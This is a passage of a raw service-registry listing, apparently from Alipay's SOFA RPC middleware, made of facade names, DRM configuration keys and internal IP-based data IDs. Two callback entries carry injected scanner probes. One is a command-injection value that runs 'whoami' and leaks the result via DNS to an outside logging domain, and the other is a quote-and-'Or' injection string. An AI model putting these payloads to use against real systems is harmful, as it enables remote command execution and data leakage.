des,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.feature.common.service.facade.sql.service.EventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developertool.facade.intelliassist.IntelliassistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IZoneMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpcscgateway.biz.xrc.restful.ConnectionService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acoffercenter.common.service.facade.product.ProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobile-global-saas-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.176.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.health.api.UserHealthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","filebridge@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.AmdpQueryFacade:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mindv@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cfmng.biz.exratecenter.MessageFilter.blackSource,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insqa.facade.gift.RightQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zplayback.playback.service.GenericInvokeFacade:1.0:echoagent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.taobao.TaobaoAutoLoginServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.topology.TopologyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.TemplateActionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ExecutionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.TableFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcinstweb.common.service.facade.getMisUserData:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.cashing.service.CashingOrderCloseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.noNeedLoadModelUuids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.openeco.coc.ecomodel.api.merchant.MerchantQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.102.209.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.o2o.facade.MerchantInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.irisbizprod.facade.common.biz.runtime.flow.service.TreeDiagnoseFailFlowThresholdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.creditexpress.CreditExpressConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:rmsdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.common.service.facade.CollectionActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.riskmng.zscriptDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mobilegeocoding:name=com.alipay.mobilegeocoding.core.service.drm.DistrictVersionResource.aMapAttributeStandbyVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdatafront.common.service.facade.commonquery.CommonQueryService:1.0:zmepconnector@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.biz.task.QuotationProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.FinancialInstInfoQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.ConfigServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.datacube.common.service.facade.facade.CognSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilesearch.biz.rpc.service.TranslateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-promokernel-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iexchange.service.facade.api.query.ExchangeRateCurrencyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.AvailableAmountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bktradecore.common.service.facade.api.order.VostroOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.MinitransSlaDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.distinguish.drm.ArResMngDrm.chatBotTokens,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chargefront.service.facade.preauth.api.ChargeFrontPreAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.facade.scenario.ContractManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:myentcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bbccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.databus.common.service.facade.AbusSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.experiencehall.EhManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:componentsff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchbenefit.common.service.facade.BenefitOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscc.common.service.facade.service.credit.CreditSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.CreateAndPayCallBackFacade:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.lifeapp.ContactInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxDiscountRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.TaskService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.table.PhysicalMountTableOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.ucdp.UcdpAppxcoreInitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.common.DomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:�'\\tOr\\tantwebscansYW50=ODAxMDIwNTMtdW5pcXVlSWQtMTEwMDAyMDIy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.IguideComponentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.SystemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbdelivery.common.service.facade.api.DeliveryOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.facade.UserLabelService:1.0:ngfe-service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcdp.common.service.facade.content.KbcdpWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.248.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yfd.common.service.facade.dm.DomainModelVipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.token.spi.VerifierProdmngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseLabelFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.:name=com.alipay.rep.event.drm.StandardEventResource.useOfflineAsProd,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.SkynetDrmSwitch.autoFullpathSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.InvoiceTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.shadowMethodConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_MPROMO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pointmng_point_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bmw.coresrv.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.micloan.agdslibra.facade.service.HbaseCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.RuleCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.SelectResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.facade.MerchantMsgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aldashboard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundprod.common.service.facade.api.TransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.242.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.176.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:JAM@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.ContentManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.LCSCallOutHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.dd.common.service.mng.facade.api.DecisionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:ccrprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:fcvostroflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.AgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.RemoteServiceDrmResource.permLimitSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.engine.common.api.DecisionStatusService:1.0:ins_marketing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.CategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:finquotationcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.PushMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.speech.banner.BannerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.comment.ServiceCommentConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.ppwLink,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.mybank.bkassetmore.common.service.facade.api.OrgServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.25.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.channelmanager.alarm.AlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.shareVoucherTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mobilesp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zfeeclcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.aptrans.api.AptransSwitchRecordModeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchasset_deliveryOrderCreateAndAssign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.holdTimeRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cifcommon.business.platform.bankcard.facade.BankCardQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csactive.common.service.facade.mng.service.InsightModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.52.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bstsolprod.biz.service.cooperation.facade.FundsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.jiaofei.CommunityPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelink.common.service.facade.SpannerManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bugscan.service.BugScanApkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofamesh.sofa4RpcMosnServer.facade.Sofa4RpcMosnServerAntvipFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendTbPushService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.core.strategy.service.api.RsTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchstm_assetZsApplicationAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.UserLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.baobei.api.query.promo.BBPromoContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_TIMEOUT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_O_YUYAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gloanpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.contract.service.ContractCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_accountReportCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.13.139.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.headguide.api.UserHeaderCardContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.alarmanalysis.QuickInvestigationFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCREDITPREREC-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mychain.z.did.facade.TaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofaboot.webdemo.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mma.facade.api.CorpInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ping `whoami`GIYHU5BSMQWTC5LVPJRW2LK7NFXHA5LUL5RWQYLSONSXILLEHFZTO3DZMFYQ----.rce.scan.noble.dn5l0g.co@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cfaccounttrans.facade.innertrans.InnerTransAccountTallyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.ApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.FundBillQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinComposeHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.gfas.gfasShardingDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.49.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alcorporation.common.service.facade.api.AlCorpMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.feed.ContentFeedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_accountBasicInfoCheckCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.minicenter.common.service.facade.api.inner.MiniAppQueryInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.indicatorRiskMapInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.adaptor.changefree.ChangefreeCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:ternadmin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.MiniAppVersionMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.invite.InviteEventProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaota.biz.service.impl.common.antq.IotThingShadowHandler:1.0:iotDeviceAppInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.SelectFeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.activity.service.ActivityPrizeRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.shopminiapp.facade.api.banner.ShopBannerOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloud.ldc.metadata.facade.ops.OBMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:commoncard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.zpaas_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdchecker.service.integration.rmc.RmcQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-1000013@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.influence.InfluenceAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sopMetaDataDeleteCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxGainLossTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.aecFacade.AecFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_ZM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iecpprod.common.service.facade.api.RiskChallengeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkloansupport_coll_anti_fraud_task_cancel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finconsumeprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitradeprod.common.facade.service.OrderCreateFacade:1.0:unitradeprodutc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_LILONG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialportal.web.verify.rpc.facade.VerifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.235.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antinvoice.common.service.facade.miniapp.EinvInvoiceApplyDownloadFacade:1.0:einvInvoiceApplyDownloadFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.devicebizfile.DeviceBizFileHistoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.log.conf.BizMonLogConfCtrlDrm.bizMonMx,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.215.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.globalBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:internal_promox@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.tinyapp.TinyAppManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.isv.BenchPicTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:timeout@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.channel.config.InstChannelApiQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_RCACHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:kbretailprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExClientAgrMappingMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprodapicore.fac